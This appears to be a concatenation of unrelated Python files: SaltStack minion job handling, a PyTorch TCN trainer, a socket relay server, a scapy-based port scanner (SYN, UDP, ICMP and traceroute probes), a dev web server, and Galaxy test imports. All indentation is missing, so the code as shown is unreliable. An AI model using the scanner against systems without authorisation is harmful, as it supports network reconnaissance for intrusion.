except Exception: # pylint: disable=broad-except
msg = "The minion function caused an exception"
log.warning(msg, exc_info=True)
salt.utils.error.fire_exception(
salt.exceptions.MinionError(msg), opts, job=data
)
ret["return"] = "{}: {}".format(msg, traceback.format_exc())
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions["sys.doc"]("{}*".format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(
function_name
)
ret["return"] = docs
else:
ret["return"] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split(".")[0]
if mod_name in minion_instance.function_errors:
ret["return"] += ' Possible reasons: "{}"'.format(
minion_instance.function_errors[mod_name]
)
ret["success"] = False
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
ret["out"] = "nested"
ret["jid"] = data["jid"]
ret["fun"] = data["fun"]
ret["fun_args"] = data["arg"]
if "master_id" in data:
ret["master_id"] = data["master_id"]
if "metadata" in data:
if isinstance(data["metadata"], dict):
ret["metadata"] = data["metadata"]
else:
log.warning("The metadata parameter must be a dictionary. Ignoring.")
if minion_instance.connected:
minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get("return"), str):
if data["ret"]:
data["ret"] = ",".join((data["ret"], opts["return"]))
else:
data["ret"] = opts["return"]
# TODO: make a list? Seems odd to split it this late :/
if data["ret"] and isinstance(data["ret"], str):
if "ret_config" in data:
ret["ret_config"] = data["ret_config"]
if "ret_kwargs" in data:
ret["ret_kwargs"] = data["ret_kwargs"]
ret["id"] = opts["id"]
for returner in set(data["ret"].split(",")):
try:
returner_str = "{}.returner".format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(
returner_str
)
log.error(
"Returner %s could not be loaded: %s",
returner_str,
returner_err,
)
except Exception as exc: # pylint: disable=broad-except
log.exception("The return failed for job %s: %s", data["jid"], exc)
def thread_multi_return(cls, minion_instance, opts, data):
"""
This method should be used as a threading target, start the actual
minion side execution.
"""
fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
if opts["multiprocessing"] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle(
"{}._thread_multi_return {}".format(cls.__name__, data["jid"])
)
sdata = {"pid": os.getpid()}
sdata.update(data)
log.info("Starting a new job with PID %s", sdata["pid"])
with salt.utils.files.fopen(fn_, "w+b") as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get("multifunc_ordered", False)
num_funcs = len(data["fun"])
if multifunc_ordered:
ret = {
"return": [None] * num_funcs,
"retcode": [None] * num_funcs,
"success": [False] * num_funcs,
}
else:
ret = {"return": {}, "retcode": {}, "success": {}}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret["success"][data["fun"][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts["pillar"].get(
"minion_blackout", False
):
whitelist = minion_instance.opts["pillar"].get(
"minion_blackout_whitelist", []
)
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if (
data["fun"][ind] != "saltutil.refresh_pillar"
and data["fun"][ind] not in whitelist
):
minion_blackout_violation = True
elif minion_instance.opts["grains"].get("minion_blackout", False):
whitelist = minion_instance.opts["grains"].get(
"minion_blackout_whitelist", []
)
if (
data["fun"][ind] != "saltutil.refresh_pillar"
and data["fun"][ind] not in whitelist
):
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError(
'Minion in blackout mode. Set "minion_blackout" '
"to False in pillar or grains to resume operations. Only "
"saltutil.refresh_pillar allowed in blackout mode."
)
func = minion_instance.functions[data["fun"][ind]]
args, kwargs = salt.minion.load_args_and_kwargs(
func, data["arg"][ind], data
)
minion_instance.functions.pack["__context__"]["retcode"] = 0
key = ind if multifunc_ordered else data["fun"][ind]
ret["return"][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack["__context__"].get("retcode", 0)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(
ret["return"][key].get(x, True) for x in ("result", "success")
)
except Exception: # pylint: disable=broad-except
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret["retcode"][key] = retcode
ret["success"][key] = retcode == 0
except Exception as exc: # pylint: disable=broad-except
trb = traceback.format_exc()
log.warning("The minion function caused an exception: %s", exc)
if multifunc_ordered:
ret["return"][ind] = trb
else:
ret["return"][data["fun"][ind]] = trb
ret["jid"] = data["jid"]
ret["fun"] = data["fun"]
ret["fun_args"] = data["arg"]
if "metadata" in data:
ret["metadata"] = data["metadata"]
if minion_instance.connected:
minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
if data["ret"]:
if "ret_config" in data:
ret["ret_config"] = data["ret_config"]
if "ret_kwargs" in data:
ret["ret_kwargs"] = data["ret_kwargs"]
for returner in set(data["ret"].split(",")):
ret["id"] = opts["id"]
try:
minion_instance.returners["{}.returner".format(returner)](ret)
except Exception as exc: # pylint: disable=broad-except
log.error("The return failed for job %s: %s", data["jid"], exc)
def handle_payload(self, payload):
if payload is not None and payload["enc"] == "aes":
# First handle payload for the "control" proxy
if self._target_load(payload["load"]):
self._handle_decoded_payload(payload["load"])
# The following handles the sub-proxies
sub_ids = self.opts["proxy"].get("ids", [self.opts["id"]])
for _id in sub_ids:
instance = self.deltaproxy_objs[_id]
if instance._target_load(payload["load"]):
instance._handle_decoded_payload(payload["load"])
elif self.opts["zmq_filtering"]:
# In the filtering enabled case, we"d like to know when minion sees something it shouldnt
log.trace(
"Broadcast message received not for this minion, Load: %s", payload["load"]
)
# If it"s not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def handle_decoded_payload(self, data):
"""
Override this method if you wish to handle the decoded data
differently.
"""
if "user" in data:
log.info(
"User %s Executing command %s with jid %s",
data["user"],
data["fun"],
data["jid"],
)
else:
log.info("Executing command %s with jid %s", data["fun"], data["jid"])
log.debug("Command details %s", data)
# Don"t duplicate jobs
log.trace("Started JIDs: %s", self.jid_queue)
if self.jid_queue is not None:
if data["jid"] in self.jid_queue:
return
else:
self.jid_queue.append(data["jid"])
if len(self.jid_queue) > self.opts["minion_jid_queue_hwm"]:
self.jid_queue.pop(0)
if isinstance(data["fun"], str):
if data["fun"] == "sys.reload_modules":
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get("process_count_max")
if process_count_max > 0:
process_count = self.subprocess_list.count
once_logged = False
while process_count >= process_count_max:
if once_logged is False:
log.debug(
"Maximum number of processes reached while executing jid %s, waiting...",
data["jid"],
)
once_logged = True
yield tornado.gen.sleep(0.5)
process_count = self.subprocess_list.count
# We stash an instance references to allow for the socket
# communication in Windows. You can"t pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get("multiprocessing", True)
if multiprocessing_enabled:
if sys.platform.startswith("win"):
# let python reconstruct the minion on the other side if we"re
# running on windows
instance = None
process = SignalHandlingProcess(
target=target, args=(self, instance, instance.opts, data, self.connected)
)
else:
process = threading.Thread(
target=target,
args=(self, instance, instance.opts, data, self.connected),
name=data["jid"],
)
process.start()
process.name = "{}-Job-{}".format(process.name, data["jid"])
self.subprocess_list.add(process)
def target_load(self, load):
# Verify that the publication is valid
for key in ("tgt", "jid", "fun", "arg"):
if key not in load:
return False
# Verify that the publication applies to this minion
# It"s important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G "grain_key:grain_val" test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if "tgt_type" in load:
match_func = self.matchers.get("{}_match.match".format(load["tgt_type"]), None)
if match_func is None:
return False
if load["tgt_type"] in ("grain", "grain_pcre", "pillar"):
delimiter = load.get("delimiter", DEFAULT_TARGET_DELIM)
if not match_func(load["tgt"], delimiter=delimiter, opts=self.opts):
return False
elif not match_func(load["tgt"], opts=self.opts):
return False
else:
if not self.matchers["glob_match.match"](load["tgt"], opts=self.opts):
return False
return True
# Main Minion Tune In
def tune_in(self, start=True):
"""
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
"""
for proxy_id in self.deltaproxy_objs:
_proxy_minion = self.deltaproxy_objs[proxy_id]
_proxy_minion.setup_scheduler()
_proxy_minion.setup_beacons()
_proxy_minion._state_run()
super(ProxyMinion, self).tune_in(start=start)
|
train_tcn.py | import os
import argparse
import torch
import numpy as np
from torch import optim
import multiprocessing
from threading import Thread
from queue import Queue
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from util import (SingleViewTripletBuilder, MultiViewTripletBuilder, distance, Logger, ensure_folder)
from tcn import define_model
IMAGE_SIZE = (299, 299)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--start-epoch', type=int, default=1)
parser.add_argument('--epochs', type=int, default=1000, help='Number of epochs to run the training for')
parser.add_argument('--save-every', type=int, default=25, help='Number of epochs after which the model gets saved')
parser.add_argument('--model-folder', type=str, default='./trained_models/tcn/', help='Directory to save the models')
parser.add_argument('--load-model', type=str, required=False, help='The model to be loaded')
parser.add_argument('--mode', choices=['single','multi'], default='multi', help='Whether to use Single View or Multi View TCN')
parser.add_argument('--train-directory', type=str, default='./data/train/', help='Directory with the training videos')
parser.add_argument('--validation-directory', type=str, default='./data/val/', help='Directory with the validation videos')
# Using a suffix to differentiate the different views, like in the orinigal Tensorflow code.
parser.add_argument('--train-suffix', type=str, default='_C[.]*.*', help='Suffix to partition training videos based on the different views')
parser.add_argument('--minibatch-size', type=int, default=32, help='Mini batch size to use for training')
parser.add_argument('--margin', type=float, default=2.0, help='Margin for the loss function')
parser.add_argument('--model-name', type=str, default='tcn', help='Name for the model to be saved')
parser.add_argument('--log-file', type=str, default='./out.log', help='Path to the log file')
parser.add_argument('--lr-start', type=float, default=0.01, help='Initial learning rate')
parser.add_argument('--triplets-from-videos', type=int, default=5)
return parser.parse_args()
arguments = get_args()
logger = Logger(arguments.log_file)
def batch_size(epoch, max_size):
exponent = epoch // 100
return min(max(2 ** (exponent), 2), max_size)
if arguments.mode == 'single':
validation_builder = SingleViewTripletBuilder(arguments.validation_directory, IMAGE_SIZE, arguments, sample_size=100)
elif arguments.mode == 'multi':
validation_builder = MultiViewTripletBuilder(arguments.validation_directory, arguments.train_suffix, 3, IMAGE_SIZE, [], sample_size=100)
logger.info('Building validation sets')
validation_set = [validation_builder.build_set() for i in range(10)]
logger.info('Built validation sets')
logger.info('Concatenating validation sets')
validation_set = ConcatDataset(validation_set)
logger.info('Concatenated validation sets')
del validation_builder
def validate(tcn, use_cuda, arguments):
with torch.no_grad():
# Run model on validation data and log results
data_loader = DataLoader(validation_set, batch_size=100, shuffle=False)
correct_with_margin = 0
correct_without_margin = 0
for minibatch, _ in data_loader:
frames = Variable(minibatch)
if use_cuda:
frames = frames.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_output = tcn(anchor_frames)
positive_output = tcn(positive_frames)
negative_output = tcn(negative_frames)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
assert(d_positive.size()[0] == minibatch.size()[0])
correct_with_margin += ((d_positive + arguments.margin) < d_negative).data.cpu().numpy().sum()
correct_without_margin += (d_positive < d_negative).data.cpu().numpy().sum()
message = "Validation score correct with margin {with_margin}/{total} and without margin {without_margin}/{total}".format(
with_margin=correct_with_margin,
without_margin=correct_without_margin,
total=len(validation_set)
)
logger.info(message)
def model_filename(model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(queue, triplet_builder, log):
while 1:
datasets = []
for i in range(5):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(use_cuda):
tcn = define_model(use_cuda)
# tcn = PosNet()
if arguments.load_model:
model_path = os.path.join(
arguments.model_folder,
arguments.load_model
)
# map_location allows us to load models trained on cuda to cpu.
tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if use_cuda:
tcn = tcn.cuda()
return tcn
def main():
use_cuda = torch.cuda.is_available()
logger.info('CUDA status: {0}'.format(use_cuda))
logger.info('Creating TCN Model')
tcn = create_model(use_cuda)
if arguments.mode=='single':
triplet_builder = SingleViewTripletBuilder(arguments.train_directory, IMAGE_SIZE, arguments, sample_size=100)
elif arguments.mode=='multi':
triplet_builder = MultiViewTripletBuilder(arguments.train_directory, arguments.train_suffix, 3, IMAGE_SIZE, [], sample_size=100)
queue = Queue(1)
worker = Thread(target=build_set, args=(queue, triplet_builder, logger,))
worker.setDaemon(True)
worker.start()
optimizer = optim.SGD(tcn.parameters(), lr=arguments.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones.
# 0.1, 0.01, 0.001
learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[100, 500, 1000], gamma=0.1)
ITERATE_OVER_TRIPLETS = 5
for epoch in range(arguments.start_epoch, arguments.start_epoch + arguments.epochs):
logger.info("Starting epoch: {0} learning rate: {1}".format(epoch,
learning_rate_scheduler.get_lr()))
dataset = queue.get()
logger.info("Got {0} triplets".format(len(dataset)))
data_loader = DataLoader(
dataset=dataset,
batch_size=arguments.minibatch_size, # batch_size(epoch, arguments.max_minibatch_size),
shuffle=True
)
if epoch % 10 == 0:
logger.info('Validating after {0} epochs'.format(epoch))
validate(tcn, use_cuda, arguments)
for _ in range(0, ITERATE_OVER_TRIPLETS):
losses = []
for minibatch, _ in data_loader:
frames = Variable(minibatch)
if use_cuda:
frames = frames.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_output = tcn(anchor_frames)
positive_output = tcn(positive_frames)
negative_output = tcn(negative_frames)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
loss = torch.clamp(arguments.margin + d_positive - d_negative, min=0.0).mean()
losses.append(loss.data.cpu().numpy())
optimizer.zero_grad()
loss.backward()
optimizer.step()
logger.info('loss: ', np.mean(losses))
learning_rate_scheduler.step()
if epoch % arguments.save_every == 0 and epoch != 0:
logger.info('Saving model.')
save_model(tcn, model_filename(arguments.model_name, epoch), arguments.model_folder)
worker.join()
if __name__ == '__main__':
main()
|
server.py | import socket
from threading import Thread
import traceback
import json
import struct
from copy import deepcopy
import random
from tkinter import *
from GUI import Window
from queue import Queue
buf_size = 1024
class Server(Thread):
def __init__(self, root):
super().__init__()
self.host = '127.0.0.1'
self.port = random.randrange(1024, 9999)
self.client_list = []
self.connection_list = {}
self.sending_receiving_list = []
self.signal = False
# keeps a tuple of 3 elements:
# 1.sending client address
# 2.receiving client address
# 3.whether the request has been accepted or not
############################################
# create a socket with ipv4 and TCP protocol
self.tcp_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.udp_soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tcp_soc.bind((self.host, self.port))
self.udp_soc.bind((self.host, self.port))
self.root = root
self.tcp_soc.listen(4)
def run(self):
root1 = Toplevel(self.root)
root1.wm_geometry("800x500")
self.sender_window = Window(root1, "server")
try:
Thread(target=self.handle_udp_messages).start()
except:
print("UDP Thread did not start.")
traceback.print_exc()
while True:
connection, client_address = self.tcp_soc.accept()
self.client_list.append(client_address)
self.connection_list[client_address] = connection
self.sender_window.server_init_window(self.client_list)
print("server: Connected with " + client_address[0] + ":" + str(client_address[1]))
try:
Thread(target=self.handle_tcp_messages, args=(connection, client_address)).start()
except:
self.sender_window.server_warning()
print("TCP Thread did not start.")
traceback.print_exc()
def handle_tcp_messages(self, connection, client_address):
# get tcp messages
while True:
buf = b''
while len(buf) < 4:
buf += connection.recv(4 - len(buf))
length = struct.unpack('!I', buf)[0]
buf = b''
while len(buf) < length:
buf += connection.recv(length - len(buf))
msg = json.loads(buf.decode('utf-8'))
self.sender_window.server_messages(msg.get('request'), client_address[1])
print('server:', str(client_address[1]), '-->', msg)
if msg.get('request') == 'GetClintList':
client_list_copy = deepcopy(self.client_list)
client_list_copy.remove(client_address)
packet = json.dumps({'ReplyClientList': client_list_copy}).encode('utf-8')
self.sender_window.server_messages(packet, 'server')
length = struct.pack('!I', len(packet))
packet = length + packet
connection.sendall(packet)
elif msg.get('request') == 'RequestToSend':
packet = msg
self.sender_window.server_messages(packet, client_address[1])
# self.gui(client_address[0] + str(client_address[1]) + ' sent' + '<RequestToSend>')
to = packet.pop('to')
# check the validity of the receiving client address
if (to[0], to[1]) in self.client_list:
packet['from'] = client_address
packet = json.dumps(packet).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
dest = (to[0], to[1])
self.sender_window.server_messages(packet, 'server' , to)
self.connection_list[dest].sendall(packet)
self.sending_receiving_list.append((client_address, dest, False))
else:
msg = {
'request': 'NoSuchClient'
}
packet = json.dumps(msg).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
connection.sendall(packet)
connection.close()
elif msg.get('request') == 'AcceptRequest':
packet = msg
# check if this client is allowed to send an accept request and who is the sender
for element in self.sending_receiving_list:
if element[1] == client_address:
if element[2] is False:
# allowed
to = element[0]
packet['from'] = client_address
packet = json.dumps(packet).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
i = self.sending_receiving_list.index((to, client_address, False))
# update the sending receiving list
self.sending_receiving_list[i] = (to, client_address, True)
self.connection_list[to].sendall(packet)
else:
msg = {
'request': 'InvalidRequest'
}
packet = json.dumps(msg).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
connection.sendall(packet)
connection.close()
break
else:
msg = {
'request': 'InvalidRequest'
}
packet = json.dumps(msg).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
connection.sendall(packet)
connection.close()
else:
msg = {
'request': 'InvalidRequest'
}
packet = json.dumps(msg).encode('utf-8')
length = struct.pack('!I', len(packet))
packet = length + packet
connection.sendall(packet)
connection.close()
def receive_udp(self, queue):
data, address = self.udp_soc.recvfrom(buf_size)
try:
while data:
self.signal = True
queue.put((data, address))
data, address = self.udp_soc.recvfrom(buf_size)
self.udp_soc.settimeout(2)
except socket.timeout:
self.signal = False
def handle_udp_messages(self):
# get udp messages
queue = Queue()
self.signal = False
try:
Thread(target=self.receive_udp, args=(queue, )).start()
except:
print("Auto client list Thread did not start.")
traceback.print_exc()
while not self.signal:
pass
while self.signal:
while not queue.empty():
data, address = queue.get()
for element in self.sending_receiving_list:
if element[0] == address and element[2] is True:
receiving_client_address = element[1]
self.udp_soc.sendto(data, receiving_client_address)
|
PyPortScanner.py | import argparse
import logging
import time
import Queue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from threading import *
import sys
# Where you want to save your html file
html_file = "dashboard.html"
src_port = 400
# Thread dictionary
Hosts = dict()
# My Host class which makes working with threads easier
class Host:
tcp_ports = set()
udp_ports = set()
traceroute = set()
ICMP_ping = False
name = ""
def __init__(self, pname):
self.name = pname
self.traceroute = set()
self.tcp_ports = set()
self.udp_ports = set()
def tcpScan(tgtHost, tgtPort):
# This is where we perform the TCP scan
tcp_connect_scan_resp = sr1(IP(dst=tgtHost)/TCP(sport=src_port,dport=tgtPort,flags="S"),timeout=3, verbose=0)
# If a bad response, than it was closed
if(str(type(tcp_connect_scan_resp))!="<type 'NoneType'>") and tcp_connect_scan_resp.haslayer(TCP):
if(tcp_connect_scan_resp.getlayer(TCP).flags == 0x12):
Hosts[tgtHost].tcp_ports.add(tgtPort)
def udpScan(tgtHost, tgtPort):
# Sends an UDP request, if no response is received the port is identified as being open
ans = sr1(IP(dst=tgtHost)/UDP(dport=tgtPort),timeout=5,verbose=0)
time.sleep(1)
# We can identify all ports that don't return an ICMP host-unreachable reply
if ans == None:
Hosts[tgtHost].udp_ports.add(tgtPort)
def icmpScan(tgtHost, tgtPort):
# Sends an ICMP ping
ICMP_connect_scan_resp,unans=sr(IP(dst=tgtHost)/ICMP(), verbose=0)
# If it comes back successfully than it was a successful ICMP ping
if(str(type(ICMP_connect_scan_resp))!="<type 'NoneType'>"):
Hosts[tgtHost].ICMP_ping = True
def traceRoute(tgtHost, tgtPort):
ttl = 1
while 1:
p=sr1(IP(dst=tgtHost,ttl=ttl)/ICMP(id=os.getpid()), verbose=0)
# if time exceeded due to TTL exceeded
if p[ICMP].type == 11 and p[ICMP].code == 0:
traceroute = "{} -> {}".format(ttl, p.src)
Hosts[tgtHost].traceroute.add(traceroute)
ttl += 1
# Or if the type is correct
elif p[ICMP].type == 0:
traceroute = "{} -> {}".format(ttl, p.src)
Hosts[tgtHost].traceroute.add(traceroute)
break
def portScan(tgtHosts, tgtPorts):
# Simple for loop where I run through all the hosts and ports
# and thread them
for tgtHost in tgtHosts:
for tgtPort in tgtPorts:
t1 = Thread(target=tcpScan, args=(tgtHost, int(tgtPort)))
t1.start()
t2 = Thread(target=udpScan, args=(tgtHost, int(tgtPort)))
t2.start()
t3 = Thread(target=icmpScan, args=(tgtHost, 11))
t3.start()
t4 = Thread(target=traceRoute, args=(tgtHost, 7))
t4.start()
time.sleep(20)
def printHosts():
# A simple printing function for the command line
for host_name in Hosts:
host = Hosts[host_name]
print "[+] Host: {}".format(host.name)
if (host.ICMP_ping):
print "[+] Successful ICMP Ping"
else:
print "[-] Could not be ICMP Pinged"
for tcp_port in host.tcp_ports:
print "[+] TCP Ports: {} OPEN".format(tcp_port)
for udp_port in host.udp_ports:
print "[+] UDP Ports: {} OPEN".format(udp_port)
for traceroute in host.traceroute:
print "[+] TraceRoute: {}".format(traceroute)
print "[+] Finished"
sys.exit(0)
def htmlHosts():
dirty_html = ""
# This is a long and convoluted way of printing everything to an HTML file
begin = """
<!DOCTYPE html>
<html>
<head>
<title>Hosts</title>
<style>
select {
background-color: #507FB3;
color: #F0F9FC;
font-size: 14px;
}
a {
color: white;
}
</style>
</head>
<body style="background-color:#0151AB">
"""
dirty_html += begin
for host_name in Hosts:
host = Hosts[host_name]
ICMP_string = ""
if (host.ICMP_ping):
ICMP_string = "Successful"
else:
ICMP_string = "Failed"
host_html = """
<center>
<h1 style="color:#ffb7b9;text-decoration: underline;">
{}</h1>
</center>
<table border= "1" class="sortable" align="center" style="color:#F0F9FC;font-size:19px">
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>ICMP Ping</td>
</tr>
<tr>
<td>{}</td></tr>
""".format(host_name, ICMP_string)
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>TCP Ports Open</td>
</tr>
<tr>
<td>
"""
for tcp_port in host.tcp_ports:
host_html += "{} ".format(tcp_port)
host_html += "</td></tr>"
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>UDP Ports Open</td>
</tr>
<tr>
<td>
"""
for udp_port in host.udp_ports:
host_html += "{} ".format(udp_port)
host_html += "</td></tr>"
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>TraceRoute</td>
</tr>
<tr>
<td>
"""
for traceroute in host.traceroute:
host_html += "{} ".format(traceroute)
host_html += "</td></tr></table>"
dirty_html += host_html
dirty_html += "</body></html>"
html_file = open(html_file, "w")
html_file.write(dirty_html)
html_file.close()
print "[+] Html Written"
def main(): #Uses arg parse, gets a list of hosts or ports, pretty simple to use
parser = argparse.ArgumentParser(description = 'A simple Python port scanner.')
parser.add_argument('-H', type = str, nargs = '+', help = 'website or ip address')
parser.add_argument('-p', metavar = 'N', type = int, nargs = '+', help = 'one or several port numbers')
args = parser.parse_args()
tgtHosts = args.H
tgtPorts = args.p
if (tgtHosts == None) or(tgtPorts == None):
print '[-] You must specify a target host and port[s].'
exit(0)
for tgtHost in tgtHosts:
new_host = Host(tgtHost)
Hosts[tgtHost] = new_host
portScan(tgtHosts, tgtPorts)
htmlHosts()
printHosts()
if __name__ == '__main__':
main()
|
devserver.py | #!/usr/bin/env python
"""
To get quick feedback this implements an automatically reloading web server
to be run locally.
Reloading functionality is taken from the fabulous
`Werkzeug WSGI toolkit <http://www.pocoo.org/projects/werkzeug/#werkzeug>`
"""
import logging
import mimetypes
import os
import subprocess
import sys
import time
import threading
from wsgiref import simple_server, util
log = logging.getLogger(__name__)
RUN_MAIN_ENV_KEY = 'RUN_MAIN_ENV_KEY'
# todo refactor into generalized class
# todo use local.path object throughout
def restart_with_reloader():
"""Spawn a new Python interpreter with the same arguments as this one,
but running the reloader thread.
"""
while True:
log.info("***restarting with reloader***")
args = [sys.executable] + sys.argv
new_environ = os.environ.copy()
new_environ[RUN_MAIN_ENV_KEY] = 'true'
exit_code = subprocess.call(args, env=new_environ)
if exit_code != 3:
return exit_code
def run_with_reloader(main_func, pathToWatch, pathToIgnore,
cleanFileNames, cleanPaths):
"""Run the given function in an independent python interpreter."""
import signal
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
if os.environ.get(RUN_MAIN_ENV_KEY) == 'true':
t = threading.Thread(target=main_func)
t.start()
try:
reloader_loop(pathToWatch, pathToIgnore,
cleanFileNames, cleanPaths)
except KeyboardInterrupt:
return
try:
sys.exit(restart_with_reloader())
except KeyboardInterrupt:
pass
def reloader_loop(pathToWatch, pathToIgnore, cleanFileNames, cleanPaths,
interval=0.5):
"""When this function is run from the main thread, it will force other
threads to exit when any files passed in here change..
Copyright notice: this function is based on ``_reloader_stat_loop()``
from Werkzeug which is based on autoreload.py
from CherryPy trac which originated from WSGIKit which is now dead.
:param LocalPath pathToWatch: path of the directory to be watched.
"""
pathTimeMap = {}
while True:
# for p in cleanPaths:
# if not p.exists():
# log.info("%s does not exist: trigger build..." % (p))
# sys.exit(3)
paths = [p for p in pathToWatch.walk(
filter=lambda p: "\\." not in p._path and "/." not in p._path)
if not p._path.startswith(pathToIgnore._path) and
"\\." not in p._path and "/." not in p._path and not
p.isdir()]
changedPaths = []
for filePath in paths:
try:
mtime = filePath.stat().st_mtime
except OSError:
log.warning("problem with %s" % (filePath), exc_info=True)
continue
oldTime = pathTimeMap.get(filePath)
if oldTime is None:
pathTimeMap[filePath] = mtime
continue
elif mtime > oldTime:
changedPaths.append(filePath.basename)
if cleanFileNames == "ALL":
break
if changedPaths:
# fixme handle changes in build dir intelligently (query git)
log.info("detected changes in %s: reloading" % (changedPaths))
if (cleanFileNames == "ALL" or
any(n in [b.basename for b in changedPaths]
for n in cleanFileNames)):
log.info("cleaning necessary in %s" % (cleanPaths))
for path in cleanPaths:
log.info("cleaning %s" % (path))
path.delete()
log.info("trigger build ...")
sys.exit(3)
time.sleep(interval)
def make_server(path, port):
def minimal_wsgi_app(environ, respond):
"""simple wsgi app to serve html files"""
fn = os.path.join(path, environ['PATH_INFO'][1:])
if '.' not in fn.split(os.path.sep)[-1]:
fn = os.path.join(fn, 'index.html')
type_ = mimetypes.guess_type(fn)[0]
if os.path.exists(fn):
respond('200 OK', [('Content-Type', type_)])
return util.FileWrapper(open(fn, "rb"))
respond('404 Not Found', [('Content-Type', 'text/plain')])
return ['404 not found']
return simple_server.make_server('', port, minimal_wsgi_app)
def serve_with_reloader(
serveFromPath, port, changedCallback, pathToWatch, pathToIgnore,
cleanFileNames=None, cleanPaths=None):
"""
:param serveFromPath: path to the folder to be served
:param pathToWatch: path to watch recursively for changed files
:param port: port to be served ond
:param changedCallback: function to be called if a monitored file changes
:param pathToIgnore: don't watch this path for changes
:param cleanFileNames: list of filenames that should trigger a full clean
:param cleanPaths: paths to delete on a full clean
"""
def call_func_then_serve():
"""Calls the passed in function and then starts the server"""
result = changedCallback()
log.info("call %s -> %s" % (changedCallback.__name__, result))
server = make_server(serveFromPath._path, port)
log.info("serve %s on http://localhost:%s, control-C to stop" %
(serveFromPath, port))
server.serve_forever()
log.info("Serve while watching folder %s" % (pathToWatch))
run_with_reloader(call_func_then_serve, pathToWatch, pathToIgnore,
cleanFileNames or [], cleanPaths or [])
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import (
create_database,
database_exists,
)
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import (
GalaxyInteractorApi,
verify_tool,
)
from galaxy.util import (
asbool,
download_to_file,
galaxy_directory,
)
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import (
get_admin_api_key,
get_user_api_key,
)
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
